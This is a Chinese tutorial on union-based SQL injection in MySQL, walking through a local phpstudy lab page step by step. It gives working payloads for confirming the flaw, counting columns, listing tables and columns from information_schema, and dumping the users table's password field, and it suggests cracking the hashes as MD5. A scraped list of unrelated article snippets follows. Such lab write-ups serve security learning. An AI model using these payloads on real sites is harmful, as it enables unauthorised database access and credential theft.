华丽的贵族
华丽的贵族

sql注入之联合查询(Mysql)

联合注入

联合查询union需要让前面语句报错,数字型直接加 - ,
字符型加 - 再闭合:-1’ union语句 --+

- 测试网站

phpstudy搭建的mysql网站
http://localhost/pentest/article.php?id=1
适用于Mysql网站

- 注入步骤

1.判断是否存在注入

输入and 1=1 未报错
输入and 1=2 报错
sql注入之联合查询(Mysql)_第1张图片
sql注入之联合查询(Mysql)_第2张图片

2.获取字段的总数: order by +数字

数字从1到4时4报错,所以网站字段为3
sql注入之联合查询(Mysql)_第3张图片
sql注入之联合查询(Mysql)_第4张图片
sql注入之联合查询(Mysql)_第5张图片

3.进行连接查询

http://localhost/pentest/article.php?id=-1 union select 1,2,3

//从这不开始后面都需要令id=-1让其报错

sql注入之联合查询(Mysql)_第6张图片

返回结果为2,3 说明union select 1,2,3中2,3可以输入mysql语句,尝试在2处查询数据库名( database() )

4.对数据库查询

http://localhost/pentest/article.php?id=-1 union select 1,database(),user()
只有在mysql5.0以上版本才能使用database()查询数据库
一般union select 1,database(),3 爆出数据库便可往下执行。
sql注入之联合查询(Mysql)_第7张图片
用database(),user()带入2,3或者分别带入其中某个,得到数据库的名字和用户名
sql注入之联合查询(Mysql)_第8张图片
sql注入之联合查询(Mysql)_第9张图片
图为当前网站的用户名和数据库
Mysql注入时还可以输入:
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() Mysql数据库版本
@@datadir 读取数据库路径
@@basedir Mysql安装路径
@@version_compile_os 操作系统

5.对target_sys数据库的表名进行查询

语句: select table_name from information_schema.tables where table_schema = ‘target_sys’ limit 0,1

将语句加括号后代换2或3

http://localhost/pentest/article.php?id=-1 union select 1,(select table_name from information_schema.tables where table_schema = ‘target_sys’ limit 0,1),3
sql注入之联合查询(Mysql)_第10张图片这里查出的是第一个表名,可以通过修改 语句后面的limit 0,1为limit 1,1或limit 2,1查看其他表名,这里以users表为例继续

6.对user表中的字段(列名)查询

语句: select column_name from information_schema.columns where table_schema = ‘target_sys’ and table_name = ‘users’ limit 0,1

同样将语句加括号后代换2或3

http://localhost/pentest/article.php?id=-1 union select 1,2,(select column_name from information_schema.columns where table_schema = ‘target_sys’ and table_name = ‘users’ limit 0,1)
sql注入之联合查询(Mysql)_第11张图片更换limit 1,1找打其他的字段名分别为:id,username,password,email

查询账户密码内容

http://localhost/pentest/article.php?id=-1 union select 1,2,password from users
sql注入之联合查询(Mysql)_第12张图片
用MD5解密就行了,用户名同理。

对于有waf防火墙的网站期待后面的学习吧。

你可能感兴趣的:(注入)

  • 百度地图 雷达/地理编码 功能使用 安卓开发者
    目录(?)[-]地图雷达基本使用首先你需要在你的API控制台注册你的雷达初始化并注入你的信息开始上传单次上传定时重复上传取回信息打完收工元古巨坑地理编码最近一直在优化软件的bug..然后后面可能又要大改..所以趁这两天有时间赶紧码两篇博文..=.=地图功能可以说是现在APP中最常用的功能…呃..之一..不管是电商,社交,o2o,b2c,p2p,锟斤拷,烫烫烫都需要用地图来辅助..博客里基本的地图实
  • SQL笔记纯干货 AI入门修炼 oracle数据库sql
    软件:DataGrip2023.2.3,phpstudy_pro,MySQL8.0.12目录1.DDL语句(数据定义语句)1.1数据库操作语言1.2数据表操作语言2.DML语句(数据操作语言)2.1增删改2.2题2.3备份表3.DQL语句(数据查询语言)3.1查询操作3.2题一3.3题二4.多表详解4.1一对多4.2多对多5.多表查询6.窗口函数7.拓展:upsert8.sql注入攻击演示9.拆表
  • Serverless架构下Spring Function的创新实践 tmjpz04412 serverless架构spring
    引言:Serverless与Spring生态的交汇背景介绍:云计算与Serverless架构的兴起Spring生态的演进与云原生适配性核心问题:传统Spring应用如何融入Serverless范式Serverless架构的核心特征与挑战事件驱动、弹性伸缩与按需计费冷启动问题与性能优化需求Spring应用在Serverless环境中的典型瓶颈(如依赖注入、上下文初始化)SpringFunction的
  • 2018-05-10 华英雄_712d
    2018-05-10姓名:郭祥华组别:315期六项精进努力一组【日精进打卡第194】【知~学习】背诵《六项精进》5遍共925遍。背诵《大学》5遍共925遍。朗读活法:“伟大之物向一切事物注入生命”“我为什么皈依佛门”“不完美不要紧,贵在持续精进”(经典名句)工作上有烦恼时很正常的,动不动就带回家是不理智的,不负责任的,哪里出了问题在哪里解决。用最少的悔恨面对过去,用最少的浪费面对现在,用最多的信心
  • Navicat 全面支持金仓数据库 KingbaseES,为金仓生态圈注入新动能 Navicat中国 Navicat17焕新上市Navicat免费版数据库
    近日,我们宣布Navicat系列产品全面支持中电科金仓(北京)科技股份有限公司旗下金仓数据库管理系统KingbaseES。KingbaseES是面向全行业、全客户关键应用的企业级大型通用融合数据库产品,适用于事务处理类应用、数据分析类应用、海量时序数据采集检索类应用、要求苛刻的互联网等应用场景。这次合作,不仅是Navicat在数据库管理领域的又一重要里程碑,更凭借卓越的技术为金仓数据库的生态注入新
  • 助力现代农业新发展,注入乡村振兴新动力 熙月
    党的十九大提出的乡村振兴战略是全面建成小康社会的关键。在如今“科技兴农”的新浪潮下,各地方响应国家号召,打造集食物保障、原料供给、资源开发、生态保护、经济发展、文化传承、市场服务等产业于一体的综合系统,全方位提升农业农村产业的兴旺与发展。基于此背景下,12月31日,安徽财经大学“红领巾调研团”奔赴安徽省蚌埠市蚌埠国家农业科技产业园区,开展调研活动。团队通过深入调查了解科技园区的建设和成果等,对大环
  • SQL注入:原理、类型与防范策略 数据冰山
    本文还有配套的精品资源,点击获取简介:SQL注入是一种网络攻击手段,通过不当构建的SQL查询允许攻击者插入恶意代码,从而控制数据库。这种攻击可能导致数据泄露、篡改或系统控制。介绍了SQL注入的类型,包括错误信息注入、时间基注入、盲注和堆叠查询。提供了防范SQL注入的方法,包括使用参数化查询、输入验证、转义特殊字符等策略,并建议限制数据库权限和错误处理。教程资源可能包含在"SQL注入整理"压缩包中,
  • 掌握SQL注入:漏洞演示与防护策略实战源代码 May Wei
    本文还有配套的精品资源,点击获取简介:SQL注入是一个影响Web应用和数据库安全的漏洞。通过本项目源代码演示,开发者能深入理解SQL注入的工作机制及其攻击方法。文档和源代码示例将指导如何通过构造恶意SQL语句执行非授权数据库操作,以及如何通过实践学习防止此类攻击,包括安全编码、输入验证、错误处理、数据库权限设置和日志监控等。1.SQL注入概念和攻击方法1.1SQL注入漏洞的基本原理1.1.1SQL
  • SQL 注入攻击全面解析:分类、典型案例与防御实践 阿贾克斯的黎明 网络安全数据库oracle
    目录SQL注入攻击全面解析:分类、典型案例与防御实践一、SQL注入基础概念1.1什么是SQL注入(SQLInjection)二、SQL注入攻击分类与典型案例2.1基于注入位置的分类2.1.1数字型注入2.1.2字符串型注入2.2基于回显结果的分类2.2.1显式回显注入(Union-BasedInjection)2.2.2盲注(BlindSQLInjection)2.3基于攻击手法的分类2.3.1堆
  • CTF-Web学习笔记:SQL注入篇 编程到天明 CTFsql网络安全
    目录引言一、SQL注入的基础概念1.什么是SQL注入?2.SQL注入的成因二、CTF中常见的SQL注入类型1.按参数类型分类2.按注入方式分类3.其他进阶类型三、CTF实战技巧:从找注入点到拿Flag1.如何判断是否存在注入?2.快速确定数据库类型3.常用工具辅助4.绕过WAF(Web应用防火墙)四、CTF题目示例:一道报错注入实战题目背景解题步骤五、总结与提升引言在CTF(CaptureTheF
  • 共建协同生态,共绘发展蓝图 —— OpenLoong 开源社区成功召开工作委员会筹备会议 OpenLoong 开源社区 活动会议社区资讯开源
    近日,OpenLoong开源社区工作委员会(以下简称“工委会”)筹备会议在上海张江国创中心顺利召开。本次会议由开放原子开源基金会(以下简称“基金会”)与OpenLoong开源社区联合发起,旨在进一步夯实社区治理体系,推进生态伙伴协同机制建设,围绕社区发展规划展开深度研讨,为OpenLoong项目的持续发展注入新的组织活力和治理动力。本次会议是OpenLoong社区迈向开放治理体系的重要节点,也标志
  • 疯狂小杨哥推荐的产品可以代理吗?如何代理三只羊的产品? 浮沉导师
    在这个瞬息万变的时代,数字化和平台化如同汹涌澎湃的浪潮,推动着经济不断前行,内容电商则如璀璨星辰,与各行各业深度交融,为社会民生注入强大动力。想代理疯狂小杨哥三只羊产品,其实只羊加入微易购-小二郎,即可免费分享这些产品赚佣金。方法我放在最后了。疯狂小杨哥和三只羊,以优质内容为羽翼,秉持着“有家的地方有工作”的使命,翱翔在时代的天空。众小二-微易购小程序的诞生,不仅是这一使命的延伸,更是为众多渴望改
  • FPGA知识基础之--在线调试工具 土包子=-= FPGA学习fpga开发
    文章目录前言一、定义二、特点三、功能3.1信号监控:3.2信号修改:3.3断点设置:3.4变量监视:3.5性能分析:3.6故障注入:四、主要的在线调试工具4.1Xilinx的VIO和ILA4.1.1介绍4.1.2配置步骤4.1.3使用场景4.1.4优势4.2Altera的In-SystemMemoryContentEditor4.2.1介绍4.2.2配置步骤4.2.3使用场景4.3QuartusI
  • 新的赶考之路永葆自我革命精神 简评先生
    一个饱经沧桑而初心不改的党,才能基业长青;一个铸就辉煌仍勇于自我革命的党,才能无坚不摧。近日,求是网发布《始终推进党的自我革命》文章,广大党员干部要坚持自我革命,只有努力在革故鼎新、守正出新中实现自身跨越,才能不断给党和人民事业注入生机活力。新的赶考之路永葆自我革命精神,才能应对未来的各种风险挑战。当前,中国特色社会主义进入新时代,中国人民取得一个又一个伟大胜利,解决了许多长期想解决而没有解决的难
  • 深入理解 Spring IOC:从概念到实践 十六点五 spring后端java
    目录一、引言二、什么是IOC?2.1控制反转的本质2.2类比理解三、SpringIOC的核心组件3.1IOC容器的分类3.2Bean的生命周期四、依赖注入(DI)的三种方式4.1构造器注入4.2Setter方法注入4.3注解注入(推荐)五、案例演示:从XML配置到注解驱动5.1XML配置方式5.2注解驱动方式(推荐)六、SpringIOC的优势与注意事项6.1核心优势6.2注意事项七、总结一、引言
  • 策略模式(Strategy Pattern)+ 模板方法模式(Template Method Pattern)的组合使用
    usingMicrosoft.Extensions.DependencyInjection;namespaceConsoleApp9{internalclassProgram{staticasyncTaskMain(string[]args){Console.WriteLine("Hello,World!");//创建并配置依赖注入容器var_serviceProvider=newServiceC
  • 高级07-Java安全编程:保护你的应用免受攻击 Jinkxs Java高级篇安全java
    引言在当今的数字时代,应用程序的安全性已成为软件开发过程中不可忽视的重要环节。Java作为一门广泛应用于企业级应用开发的编程语言,其安全性问题尤其受到关注。无论是在Web应用、移动应用还是后端服务中,Java开发者都需要面对各种潜在的安全威胁,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、身份验证漏洞等。因此,掌握Java安全编程的最佳实践,不仅能够提升应用程序的健壮性,还能有效
  • Drag框架为什么需要@Module这个注解 始于足下 方能行更远 17_Drag2注入框架android
    这个问题的答案取决于Engine类的具体实现。在Dagger中,依赖注入的方式主要有两种:构造函数注入和模块提供。1.无参@Module注解解释情况1:Engine类使用了@Inject注解构造函数如果Engine类的构造函数被@Inject注解标记(且构造函数参数也可被解析),那么不需要模块也能注入成功:@ComponentpublicinterfaceCarComponent{voidinje
  • AI产品经理转型三部曲-业务篇
    进入“AI产品经理转型三部曲”的核心实战环节——业务篇。如果说认知篇解决的是“为什么转”和“看准什么”,业务篇则要回答“往哪落”和“怎么成”。以下框架融合了头部企业方法论与行业前沿实践,助你将AI价值精准注入业务毛细血管:️一、业务选择:从“撒网试错”到“精准爆破”核心逻辑:70%的AI项目失败源于场景错配,需用“三层漏斗”锁定高价值爆破点第一层:行业痛点扫描ToB(企业端):聚焦“降本刚需”场景
  • Spring 容器注入时查找 Bean 的完整规则 半部论语 SpringBoot高效的Java开发实践springjava后端springboot
    Spring容器注入时查找Bean的完整规则彻底搞懂SpringIoC在运行时到底“先找谁、再找谁、如何决策”,一文掌握源码级细节。一、为什么要谈“查找规则”?在Spring应用中,我们最常见的代码是:@AutowiredprivateOrderServiceorderService;容器启动后,Spring必须回答两个问题:有哪些候选Bean?最终注入哪一个?这两个问题的答案,就是Spring容
  • 百度文心大模型ERNIE全面解析 KENYCHEN奉孝 python实践大全AIERNIE人工智能后端文心大模型python
    百度文心大模型ERNIE概述百度推出的文心大模型(ERNIE,EnhancedRepresentationthroughkNowledgeIntEgration)系列是结合知识增强技术的预训练大模型,涵盖自然语言处理(NLP)、跨模态、行业应用等多个方向。其开源版本为开发者提供了可商用的大模型能力支持。ERNIE的核心技术特点知识增强:通过多源知识图谱(如百度百科、专业领域数据)注入,提升模型对实
  • 重磅要闻!庆衍书院郭庆旺送你一万开户余额只是数字,KSD2.0光伏就是数字十选五骗局,盈亏都不会让你出金! 正义青天
    骗子通过发布一些所谓“资深老师郭庆旺”的讲课,不断给被害人洗脑,当被害人向网站平台或手机App注入大额资金后,就会被后台操作造成“持续快速亏损”或“系统故障、无法提现”假象骗走资金。不要通过不明链接或二维码下载App。不要随便进群,说稳赚不赔的都是诈骗。天上不会掉馅饼,坚信“高额回报”“快速致富”等投资理财项目都是陷阱。不轻信网络投资理财推介。对低风险高回报的投资建议提高警惕。他们通常通过股票交流
  • 数据库如何应对场景挑战?电科金仓 “融合智能” 范式给出答案! 澪贰 话题数据库
    文章目录一、场景重塑产业格局:数据库“融合进化”二、多模数据融合:打破数据藩篱,激发内在价值三、多架构随需应变:业务驱动的灵活底座四、多语法兼容:平滑迁移的“无痛”实践五、智能注入:运维自治与效能跃升的未来六、融合·智能:数据库演进新范式一、场景重塑产业格局:数据库“融合进化”AI浪潮奔涌而至,数字产业格局加速重构。云计算、移动互联、万物互联(IoT)、人工智能(AI)等技术的深度融合与快速落地,
  • 自定义定时任务功能详解 新入群的新人小猿 大数据java服务器网络运维php
    一、功能概述CRMEB标准版的自定义定时任务模块,基于ThinkPHP6框架深度优化,通过可视化配置界面实现零代码任务管理。该功能支持秒级到年度的多维度执行周期设定,并允许开发者直接注入业务逻辑代码,实现如自动发券、数据同步等高频操作。相较于传统开发模式,可节省80%的二次开发时间。二、功能配置全流程1.功能入口进入后台→系统维护→开发配置→定时任务2.任务类型区分•系统任务:预置10种常用任务(
  • Claude 实战圣经:从终端命令到自动化工作流 十三Tech AI编程系统架构后端
    停止将Claude视为一个聊天框。它是一个潜伏在你终端中的代码猛兽,等待正确的指令被唤醒第一章:终端驾驶舱(TheTerminalCockpit)-CLI命令与启动参数一切始于终端。熟练运用CLI命令,是掌控Claude的第一步。这不仅是启动工具,更是为你的每一次任务设定精确的初始状态。1.1核心启动命令命令功能说明示例claude启动REPL交互式会话claudeclaude"..."注入初始指
  • SQL盲注(异或注入)
    做题时偶然遇到一道sql注入很多关键字都过滤了看wp说是异或注入遂研究了一下目录什么是异或,异或是干什么的?基于这个基础做一下sqllabs11关什么是异或,异或是干什么的?异或(XOR),在数学和逻辑运算中,是一种二元运算,表示为“⊕”或“^”。它的特点是:如果两个比较的位不同,则结果为1(真)。如果两个比较的位相同,则结果为0(假)。在逻辑运算中,异或可以这样理解:真XOR真=假真XOR假=真
  • sql注入之布尔盲注 南棋子网络安全盟 网络安全sql数据库网络安全
    布尔盲注在页面中不会显示数据库信息,一般情况下只会显示对与错的内容。判断条件判断函数条件判断函数if是SQL时间盲注中的必用函数,可以利用if函数来根据条件来反馈不同的结果。if函数格式如下所示:if([条件],[值1],[值2])当条件成立时,if函数返回值1,当条件不成立时,if函数返回值2.布尔型盲注入用到的SQL语句selectif(1=1,1,0)。if()函数在mysql是判断,第一个
  • 深度解析:在Odoo 18中基于原生Owl框架为PWA定制功能丰富的底部导航栏 源力祁老师 odoo开发实践学习方法开发语言自动化
    本文旨在提供一个从架构设计、核心功能实现到高级用户体验优化的全面指南,详细阐述如何在Odoo18中,完全利用其原生的Owl前端框架,为渐进式网络应用(PWA)从零开始开发一个功能完备、数据驱动且高度可定制的底部导航栏。我们将深入探讨组件注入、路由集成、后端实时通信、动态权限渲染、全局状态管理及PWA离线生命周期等关键技术领域。第一部分:架构设计与核心组件构建本部分将奠定整个项目的基础,阐述导航栏O
  • 常见漏洞描述及修复建议 _JINJI_ 常用知识web安全
    1.SQL注入漏洞漏洞描述Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。修复建议代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有
  • Cacti 多行SNMP响应验证致代码执行漏洞(CVE-2025-22604) 毒手无盐虎 安全网络
    漏洞描述Cacti是一个开源的性能和故障管理框架。由于多行SNMP结果解析器中的漏洞,经过身份验证的用户可以在响应中注入恶意代码,在后续解析时导致命令执行漏洞。解决建议官方已发布1.2.29版本,建议升级至最新版本。参考链接https://github.com/Cacti/cacti/security/advisories/GHSA-c5j8-jxj3-hh36
  • java线程的无限循环和退出 3213213333332132 java
    最近想写一个游戏,然后碰到有关线程的问题,网上查了好多资料都没满足。 突然想起了前段时间看的有关线程的视频,于是信手拈来写了一个线程的代码片段。 希望帮助刚学java线程的童鞋 package thread; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date
  • tomcat 容器 BlueSkator tomcatWebservlet
    Tomcat的组成部分 1、server A Server element represents the entire Catalina servlet container. (Singleton) 2、service service包括多个connector以及一个engine,其职责为处理由connector获得的客户请求。   3、connector 一个connector
  • php递归,静态变量,匿名函数使用 dcj3sjt126com PHP递归函数匿名函数静态变量引用传参
      <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body>
  • 属性颜色字体变化 周华华 JavaScript
    function changSize(className){ var diva=byId("fot") diva.className=className; } </script> <style type="text/css"> .max{ background: #900; color:#039;
  • 将properties内容放置到map中 g21121 properties
    代码比较简单: private static Map<Object, Object> map; private static Properties p; static { //读取properties文件 InputStream is = XXX.class.getClassLoader().getResourceAsStream("xxx.properti
  • [简单]拼接字符串 53873039oycg 字符串
             工作中遇到需要从Map里面取值拼接字符串的情况,自己写了个,不是很好,欢迎提出更优雅的写法,代码如下:           import java.util.HashMap; import java.uti
  • Struts2学习 云端月影
    最近开始关注struts2的新特性,从这个版本开始,Struts开始使用convention-plugin代替codebehind-plugin来实现struts的零配置。 配置文件精简了,的确是简便了开发过程,但是,我们熟悉的配置突然disappear了,真是一下很不适应。跟着潮流走吧,看看该怎样来搞定convention-plugin。 使用Convention插件,你需要将其JAR文件放
  • Java新手入门的30个基本概念二 aijuans java新手java 入门
    基本概念:  1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。  2.OOP中最重要的思想是类,类是模板是蓝图,
  • jedis 简单使用 antlove javarediscachecommandjedis
    jedis.RedisOperationCollection.java package jedis; import org.apache.log4j.Logger; import redis.clients.jedis.Jedis; import java.util.List; import java.util.Map; import java.util.Set; pub
  • PL/SQL的函数和包体的基础 百合不是茶 PL/SQL编程函数包体显示包的具体数据
    由于明天举要上课,所以刚刚将代码敲了一遍PL/SQL的函数和包体的实现(单例模式过几天好好的总结下再发出来);以便明天能更好的学习PL/SQL的循环,今天太累了,所以早点睡觉,明天继续PL/SQL总有一天我会将你永远的记载在心里,,,   函数; 函数:PL/SQL中的函数相当于java中的方法;函数有返回值 定义函数的 --输入姓名找到该姓名的年薪 create or re
  • Mockito(二)--实例篇 bijian1013 持续集成mockito单元测试
            学习了基本知识后,就可以实战了,Mockito的实际使用还是比较麻烦的。因为在实际使用中,最常遇到的就是需要模拟第三方类库的行为。         比如现在有一个类FTPFileTransfer,实现了向FTP传输文件的功能。这个类中使用了a
  • 精通Oracle10编程SQL(7)编写控制结构 bijian1013 oracle数据库plsql
    /* *编写控制结构 */ --条件分支语句 --简单条件判断 DECLARE v_sal NUMBER(6,2); BEGIN select sal into v_sal from emp where lower(ename)=lower('&name'); if v_sal<2000 then update emp set
  • 【Log4j二】Log4j属性文件配置详解 bit1129 log4j
    如下是一个log4j.properties的配置   log4j.rootCategory=INFO, stdout , R log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appe
  • java集合排序笔记 白糖_ java
    public class CollectionDemo implements Serializable,Comparable<CollectionDemo>{ private static final long serialVersionUID = -2958090810811192128L; private int id; private String nam
  • java导致linux负载过高的定位方法 ronin47
    定位java进程ID 可以使用top或ps -ef |grep java ![图片描述][1] 根据进程ID找到最消耗资源的java pid 比如第一步找到的进程ID为5431 执行 top -p 5431 -H ![图片描述][2] 打印java栈信息 $ jstack -l 5431 > 5431.log 在栈信息中定位具体问题 将消耗资源的Java PID转
  • 给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数 bylijinnan 函数
    import java.util.ArrayList; import java.util.List; import java.util.Random; public class RandNFromRand5 { /** 题目:给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数。 解法1: f(k) = (x0-1)*5^0+(x1-
  • PL/SQL Developer保存布局 Kai_Ge
          近日由于项目需要,数据库从DB2迁移到ORCAL,因此数据库连接客户端选择了PL/SQL Developer。由于软件运用不熟悉,造成了很多麻烦,最主要的就是进入后,左边列表有很多选项,自己删除了一些选项卡,布局很满意了,下次进入后又恢复了以前的布局,很是苦恼。在众多PL/SQL Developer使用技巧中找到如下这段:   &n
  • [未来战士计划]超能查派[剧透,慎入] comsci 计划
           非常好看,超能查派,这部电影......为我们这些热爱人工智能的工程技术人员提供一些参考意见和思想........        虽然电影里面的人物形象不是非常的可爱....但是非常的贴近现实生活....    &nbs
  • Google Map API V2 dai_lm google map
    以后如果要开发包含google map的程序就更麻烦咯 http://www.cnblogs.com/mengdd/archive/2013/01/01/2841390.html 找到篇不错的文章,大家可以参考一下 http://blog.sina.com.cn/s/blog_c2839d410101jahv.html 1. 创建Android工程 由于v2的key需要G
  • java数据计算层的几种解决方法2 datamachine javasql集算器
    2、SQL     SQL/SP/JDBC在这里属于一类,这是老牌的数据计算层,性能和灵活性是它的优势。但随着新情况的不断出现,单纯用SQL已经难以满足需求,比如: JAVA开发规模的扩大,数据量的剧增,复杂计算问题的涌现。虽然SQL得高分的指标不多,但都是权重最高的。     成熟度:5星。最成熟的。   
  • Linux下Telnet的安装与运行 dcj3sjt126com linuxtelnet
    Linux下Telnet的安装与运行   linux默认是使用SSH服务的 而不安装telnet服务  如果要使用telnet 就必须先安装相应的软件包  即使安装了软件包 默认的设置telnet 服务也是不运行的 需要手工进行设置 如果是redhat9,则在第三张光盘中找到 telnet-server-0.17-25.i386.rpm
  • PHP中钩子函数的实现与认识 dcj3sjt126com PHP
    假如有这么一段程序: function fun(){ fun1(); fun2(); }   首先程序执行完fun1()之后执行fun2()然后fun()结束。   但是,假如我们想对函数做一些变化。比如说,fun是一个解析函数,我们希望后期可以提供丰富的解析函数,而究竟用哪个函数解析,我们希望在配置文件中配置。这个时候就可以发挥钩子的力量了。   我们可以在fu
  • EOS中的WorkSpace密码修改 蕃薯耀 修改WorkSpace密码
    EOS中BPS的WorkSpace密码修改 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--SpringSecurity相关配置【SpringSecurityConfig】 hanqunfeng SpringSecurity
     SpringSecurity的配置相对来说有些复杂,如果是完整的bean配置,则需要配置大量的bean,所以xml配置时使用了命名空间来简化配置,同样,spring为我们提供了一个抽象类WebSecurityConfigurerAdapter和一个注解@EnableWebMvcSecurity,达到同样减少bean配置的目的,如下:   applicationContex
  • ie 9 kendo ui中ajax跨域的问题 jackyrong AJAX跨域
    这两天遇到个问题,kendo ui的datagrid,根据json去读取数据,然后前端通过kendo ui的datagrid去渲染,但很奇怪的是,在ie 10,ie 11,chrome,firefox等浏览器中,同样的程序, 浏览起来是没问题的,但把应用放到公网上的一台服务器, 却发现如下情况: 1) ie 9下,不能出现任何数据,但用IE 9浏览器浏览本机的应用,却没任何问题
  • 不要让别人笑你不能成为程序员 lampcy 编程程序员
    在经历六个月的编程集训之后,我刚刚完成了我的第一次一对一的编码评估。但是事情并没有如我所想的那般顺利。 说实话,我感觉我的脑细胞像被轰炸过一样。 手慢慢地离开键盘,心里很压抑。不禁默默祈祷:一切都会进展顺利的,对吧?至少有些地方我的回答应该是没有遗漏的,是不是? 难道我选择编程真的是一个巨大的错误吗——我真的永远也成不了程序员吗? 我需要一点点安慰。在自我怀疑,不安全感和脆弱等等像龙卷风一
  • 马皇后的贤德 nannan408
       马皇后不怕朱元璋的坏脾气,并敢理直气壮地吹耳边风。众所周知,朱元璋不喜欢女人干政,他认为“后妃虽母仪天下,然不可使干政事”,因为“宠之太过,则骄恣犯分,上下失序”,因此还特地命人纂述《女诫》,以示警诫。但马皇后是个例外。   有一次,马皇后问朱元璋道:“如今天下老百姓安居乐业了吗?”朱元璋不高兴地回答:“这不是你应该问的。”马皇后振振有词地回敬道:“陛下是天下之父,
  • 选择某个属性值最大的那条记录(不仅仅包含指定属性,而是想要什么属性都可以) Rainbow702 sqlgroup by最大值max最大的那条记录
    好久好久不写SQL了,技能退化严重啊!!!   直入主题: 比如我有一张表,file_info, 它有两个属性(但实际不只,我这里只是作说明用): file_code, file_version 同一个code可能对应多个version 现在,我想针对每一个code,取得它相关的记录中,version 值 最大的那条记录, SQL如下: select *
  • VBScript脚本语言 tntxia VBScript
      VBScript 是基于VB的脚本语言。主要用于Asp和Excel的编程。   VB家族语言简介   Visual Basic 6.0           源于BASIC语言。           由微软公司开发的包含协助开发环境的事
  • java中枚举类型的使用 xiao1zhao2 javaenum枚举1.5新特性
    枚举类型是j2se在1.5引入的新的类型,通过关键字enum来定义,常用来存储一些常量.   1.定义一个简单的枚举类型 public enum Sex { MAN, WOMAN }   枚举类型本质是类,编译此段代码会生成.class文件.通过Sex.MAN来访问Sex中的成员,其返回值是Sex类型.   2.常用方法 静态的values()方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他